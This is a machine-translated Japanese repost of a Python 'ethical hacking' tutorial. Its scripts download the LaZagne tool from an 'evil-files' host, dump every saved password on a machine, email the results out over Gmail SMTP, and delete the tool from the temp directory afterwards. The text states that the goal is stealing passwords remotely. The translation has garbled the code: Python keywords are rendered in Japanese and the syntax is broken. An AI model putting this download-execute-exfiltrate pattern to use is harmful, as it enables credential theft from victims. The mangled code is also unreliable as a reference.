Pythonの倫理的ハッキング - マルウェア分析(4)

その他 2019-10-01 22:44:46 訪問数: null

ダウンロードファイル

  • システム上のファイルをダウンロードしてください。
  • 適切にパッケージ化されるとすると、すべてのオペレーティングシステムで動作します。
  • シンプルだが強力。

多くの状況で使用することができます。

  • ダウンロード_file + EXECUTE_COMMAND = download_and_execute
  • DOWNLOAD_FILE + execute_and_report = download_execute_and_report
  • ...等
!は/ usr / binに/のenv Pythonの
インポート要求が


デフダウンロード(URL):
    GET_RESPONSE = requests.get(URL)
    FILE_NAME = url.split(" / ")[ - 1 ] 
    (file_nameを、オープンで" WB " out_fileパラなど) :
        out_file.write(get_response.content)


ダウンロード(" https://cdn.spacetelescope.org/archives/images/screen/potw1739a.jpg "

 

 

 DOWNLOAD_EXECUTE_AND_REPORT

  • システム上のファイルをダウンロードしてください。
  • このファイルを使用してコマンドを実行します。
  • 報告書は、私たちの電子メールになります。
  • クロスマルチプラットフォーム!

例:リモートでコンピュータ上に保存されているすべてのパスワードを盗みます!

LaZagneツールを使用して:https://github.com/AlessandroZ/LaZagne

lazagne.exe --help

 

 現在のシステム内のすべてのパスワードを見つけるには、次のコマンドを使用します。

 lazagne.exeすべて

 

 リモートで保存されたパスワードを盗みます

!は/ usr / binに/ envをPythonの
インポート要求が
 インポートしたりするsmtplibの
 インポートサブプロセスは


デフ(URL)をダウンロードしてください:
    GET_RESPONSE = requests.get(URL)
    FILE_NAME = url.split(" / ")[ - 1 ] 
    file_nameを(オープンで、WB " )out_fileパラのように:
        out_file.write(get_response.content)


デフsend_mail(電子メール、パスワード、メッセージ):
    サーバー = smtplib.SMTP(" smtp.gmail.com 、587 
    server.starttls()
    server.login(電子メール、パスワード)
    server.sendmail(電子メール、電子メール、メッセージ)
    server.quit()


ダウンロード(" http://10.0.0.43/evil-files/lazagne.exe " 
結果 = subprocess.check_output(" lazagne.exeすべて"シェル= 真)
 プリント(result.decode())
send_mail(" [email protected] " " 1111111 "、結果)

 

ファイルシステムとの対話 - Pythonのスクリプトを最適化します。悪のファイルが一時ディレクトリにダウンロードして実行した後に削除されます。 

!は/ usr / binに/のenv Pythonの
インポートのOS
 インポートしたりするsmtplib
 輸入サブプロセスの
 インポート要求が
 インポート一時ファイル


デフ(URL)をダウンロードしてください:
    GET_RESPONSE = requests.get(URL)
    FILE_NAME = url.split(" / ")[ - 1 ] 
    オープンと( FILE_NAME、" WB " :out_fileパラなど)
        out_file.write(get_response.content)


デフsend_mail(電子メール、パスワード、メッセージ):
    サーバー = smtplib.SMTP(" smtp.gmail.com "、587
    server.starttls()
    server.login(電子メール、パスワード)
    server.sendmail(電子メール、電子メール、メッセージ)
    server.quit()


temp_directory = tempfile.gettempdir()
os.chdir(temp_directory)
ダウンロード(" のhttp://10.0 .0.43 /悪-ファイル/ lazagne.exe " 
結果 = subprocess.check_output(" すべてのlazagne.exe "シェル= 真)
 プリント(result.decode())
send_mail(" [email protected] " " 1111111 " 、結果)
os.remove(" lazagne.exe "

 

おすすめ

転載: www.cnblogs.com/keepmoving1113/p/11616187.html
おすすめ
米国は中国とロシアへの大型AIモデルの輸出を制限する計画
Apple、ChatGPTをiPhoneに導入することでOpenAIと合意に達する
ランキング
エコー、Linuxは最も悲しいコマンドです
OpenCVの目標追跡 - 黄Chaoxian
インターバルマージ [ペア、ソート]
Javaの8並行プログラミング
時間を[行く]包
2つのソリューションCSS揃えテキスト
ASP.NET MVCのコアアプリケーションのバックグラウンドタスク
JAVAのドキュメントは、カスタムプロパティを記述する
オーディオとビデオに基づくビデオの主なコンセプト
phpstudyバックドアRCE使用バッチスクリプト
アーカイブ
もっと
2024-05-11(31)
2024-05-10(33)
2024-05-09(30)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)

コードワールド

© 2018 codetd.com